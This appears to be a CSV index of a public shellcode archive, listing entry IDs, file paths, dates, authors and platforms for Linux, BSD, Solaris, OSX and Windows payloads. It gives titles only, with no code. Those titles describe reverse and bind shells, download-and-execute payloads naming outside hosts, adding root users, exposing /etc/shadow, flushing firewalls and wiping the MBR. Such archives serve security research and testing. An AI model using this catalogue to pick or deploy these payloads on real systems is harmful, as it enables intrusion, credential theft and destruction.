13394,shellcodes/lin_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13395,shellcodes/lin_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13396,shellcodes/lin_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13397,shellcodes/lin_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13398,shellcodes/lin_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13399,shellcodes/lin_x86/13399.c,"Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13400,shellcodes/lin_x86/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,shellcode,lin_x86
|
||||||
|
13401,shellcodes/generator/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,shellcode,generator
|
||||||
|
13402,shellcodes/lin_x86/13402.c,"Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)",2005-12-28,xort,shellcode,lin_x86
|
||||||
|
13403,shellcodes/lin_x86/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86
|
||||||
|
13404,shellcodes/lin_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86
|
||||||
|
13405,shellcodes/lin_x86/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86
|
||||||
|
13406,shellcodes/lin_x86/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86
|
||||||
|
13407,shellcodes/lin_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,lin_x86
|
||||||
|
13408,shellcodes/lin_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,lin_x86
|
||||||
|
13409,shellcodes/lin_x86/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,lin_x86
|
||||||
|
13410,shellcodes/lin_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,lin_x86
|
||||||
|
13411,shellcodes/lin_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,lin_x86
|
||||||
|
13412,shellcodes/lin_x86/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,lin_x86
|
||||||
|
13413,shellcodes/lin_x86/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,shellcode,lin_x86
|
||||||
|
13414,shellcodes/lin_x86/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,shellcode,lin_x86
|
||||||
|
13415,shellcodes/lin_x86/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,shellcode,lin_x86
|
||||||
|
13416,shellcodes/lin_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,lin_x86
|
||||||
|
13417,shellcodes/lin_x86/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,shellcode,lin_x86
|
||||||
|
13418,shellcodes/lin_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,lin_x86
|
||||||
|
13419,shellcodes/lin_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,lin_x86
|
||||||
|
13420,shellcodes/lin_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,lin_x86
|
||||||
|
13421,shellcodes/lin_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,lin_x86
|
||||||
|
13422,shellcodes/lin_x86/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,lin_x86
|
||||||
|
13423,shellcodes/lin_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,shellcode,lin_x86
|
||||||
|
13424,shellcodes/lin_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,lin_x86
|
||||||
|
13425,shellcodes/lin_x86/13425.c,"Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,lin_x86
|
||||||
|
13426,shellcodes/lin_x86/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,lin_x86
|
||||||
|
13427,shellcodes/lin_x86/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,lin_x86
|
||||||
|
13428,shellcodes/lin_x86/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13429,shellcodes/lin_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13430,shellcodes/lin_x86/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,lin_x86
|
||||||
|
13431,shellcodes/lin_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,lin_x86
|
||||||
|
13432,shellcodes/lin_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,lin_x86
|
||||||
|
13433,shellcodes/lin_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,lin_x86
|
||||||
|
13434,shellcodes/lin_x86/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,shellcode,lin_x86
|
||||||
|
13435,shellcodes/lin_x86/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,shellcode,lin_x86
|
||||||
|
13436,shellcodes/lin_x86/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,shellcode,lin_x86
|
||||||
|
13437,shellcodes/lin_x86/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13438,shellcodes/lin_x86/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,shellcode,lin_x86
|
||||||
|
13439,shellcodes/lin_x86/13439.c,"Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,shellcode,lin_x86
|
||||||
|
13440,shellcodes/lin_x86/13440.c,"Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)",2004-09-26,RaiSe,shellcode,lin_x86
|
||||||
|
13441,shellcodes/lin_x86/13441.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)",2004-09-26,Sp4rK,shellcode,lin_x86
|
||||||
|
13442,shellcodes/lin_x86/13442.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes)",2004-09-26,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13443,shellcodes/lin_x86/13443.c,"Linux/x86 - execve /bin/sh Shellcode (29 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13444,shellcodes/lin_x86/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13445,shellcodes/lin_x86/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13446,shellcodes/lin_x86/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13447,shellcodes/lin_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,lin_x86
|
||||||
|
13448,shellcodes/lin_x86/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13449,shellcodes/lin_x86/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13450,shellcodes/lin_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13451,shellcodes/lin_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,lin_x86
|
||||||
|
13452,shellcodes/lin_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,lin_x86
|
||||||
|
13453,shellcodes/lin_x86/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,shellcode,lin_x86
|
||||||
|
13454,shellcodes/lin_x86/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,shellcode,lin_x86
|
||||||
|
13455,shellcodes/lin_x86/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",shellcode,lin_x86
|
||||||
|
13456,shellcodes/lin_x86/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,shellcode,lin_x86
|
||||||
|
13457,shellcodes/lin_x86/13457.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,lin_x86
|
||||||
|
13458,shellcodes/lin_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,lin_x86
|
||||||
|
13460,shellcodes/lin_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,lin_x86
|
||||||
|
13461,shellcodes/lin_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,lin_x86
|
||||||
|
13462,shellcodes/lin_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,lin_x86
|
||||||
|
13463,shellcodes/lin_x86-64/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,lin_x86-64
|
||||||
|
13464,shellcodes/lin_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,lin_x86-64
|
||||||
|
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple
|
||||||
|
13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple
|
||||||
|
13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple
|
||||||
|
13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple
|
||||||
|
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple
|
||||||
|
13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86
|
||||||
|
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
|
||||||
|
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
|
||||||
|
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
|
||||||
|
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
|
||||||
|
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes)",2006-05-01,hophet,shellcode,openbsd_x86
|
||||||
|
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
|
||||||
|
13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
|
||||||
|
13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc
|
||||||
|
13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc
|
||||||
|
13480,shellcodes/osx_ppc/13480.c,"OSX/PPC - Add Root User (r00t) Shellcode (219 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13481,shellcodes/osx_ppc/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13482,shellcodes/osx_ppc/13482.c,"OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13483,shellcodes/osx_ppc/13483.c,"OSX/PPC - Reboot Shellcode (28 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13484,shellcodes/osx_ppc/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13485,shellcodes/osx_ppc/13485.c,"OSX/PPC - Create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13486,shellcodes/osx_ppc/13486.c,"OSX/PPC - Simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13487,shellcodes/osx_ppc/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,shellcode,osx_ppc
|
||||||
|
13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
|
||||||
|
13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc
|
||||||
|
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
|
||||||
|
13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
|
||||||
|
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
|
||||||
|
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
|
||||||
|
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
|
||||||
|
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
|
||||||
|
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
|
||||||
|
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
|
||||||
|
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
|
||||||
|
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
|
||||||
|
13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
|
||||||
|
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
|
||||||
|
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
|
||||||
|
13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
|
||||||
|
13504,shellcodes/win_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,shellcode,win_x86
|
||||||
|
13505,shellcodes/win_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,win_x86
|
||||||
|
13507,shellcodes/win_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,win_x86
|
||||||
|
13508,shellcodes/win_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,win_x86
|
||||||
|
13509,shellcodes/win_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,win_x86
|
||||||
|
13510,shellcodes/win_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,win_x86
|
||||||
|
13511,shellcodes/win_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,win_x86
|
||||||
|
13512,shellcodes/win_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,win_x86
|
||||||
|
13513,shellcodes/win_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,win_x86
|
||||||
|
13514,shellcodes/win_x86/13514.asm,"Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,win_x86
|
||||||
|
13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
|
||||||
|
13516,shellcodes/win_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,win_x86
|
||||||
|
13517,shellcodes/win_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,win_x86
|
||||||
|
13518,shellcodes/win_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,win_x86
|
||||||
|
13519,shellcodes/win_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,win_x86
|
||||||
|
13520,shellcodes/win_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,win_x86
|
||||||
|
13521,shellcodes/win_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,win_x86
|
||||||
|
13522,shellcodes/win_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,win_x86
|
||||||
|
13523,shellcodes/win_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,win_x86
|
||||||
|
13524,shellcodes/win_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,win_x86
|
||||||
|
13525,shellcodes/win_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,win_x86
|
||||||
|
13526,shellcodes/win_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,win_x86
|
||||||
|
13527,shellcodes/win_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,win_x86
|
||||||
|
13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
|
||||||
|
13529,shellcodes/win_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,win_x86
|
||||||
|
13530,shellcodes/win_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,win_x86
|
||||||
|
13531,shellcodes/win_x86/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,shellcode,win_x86
|
||||||
|
13532,shellcodes/win_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,win_x86
|
||||||
|
13533,shellcodes/win_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,win_x86-64
|
||||||
|
13548,shellcodes/lin_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,lin_x86
|
||||||
|
13549,shellcodes/lin_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,lin_x86
|
||||||
|
13550,shellcodes/lin_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,lin_x86
|
||||||
|
13551,shellcodes/lin_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,lin_x86
|
||||||
|
13553,shellcodes/lin_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,lin_x86
|
||||||
|
13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
|
||||||
|
13563,shellcodes/lin_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,lin_x86
|
||||||
|
13565,shellcodes/win_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,win_x86
|
||||||
|
13566,shellcodes/lin_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,lin_x86
|
||||||
|
13569,shellcodes/win_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,win_x86
|
||||||
|
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
|
||||||
|
13571,shellcodes/win_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,win_x86
|
||||||
|
13572,shellcodes/lin_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,lin_x86
|
||||||
|
13574,shellcodes/win_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,win_x86
|
||||||
|
13576,shellcodes/lin_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,lin_x86
|
||||||
|
13577,shellcodes/lin_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,lin_x86
|
||||||
|
13578,shellcodes/lin_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,lin_x86
|
||||||
|
13579,shellcodes/lin_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,shellcode,lin_x86
|
||||||
|
13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
|
||||||
|
13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
|
||||||
|
13586,shellcodes/lin_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,lin_x86
|
||||||
|
13595,shellcodes/win_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,win_x86
|
||||||
|
13599,shellcodes/lin_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13600,shellcodes/lin_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13601,shellcodes/lin_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86
|
||||||
|
13602,shellcodes/lin_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,lin_x86
|
||||||
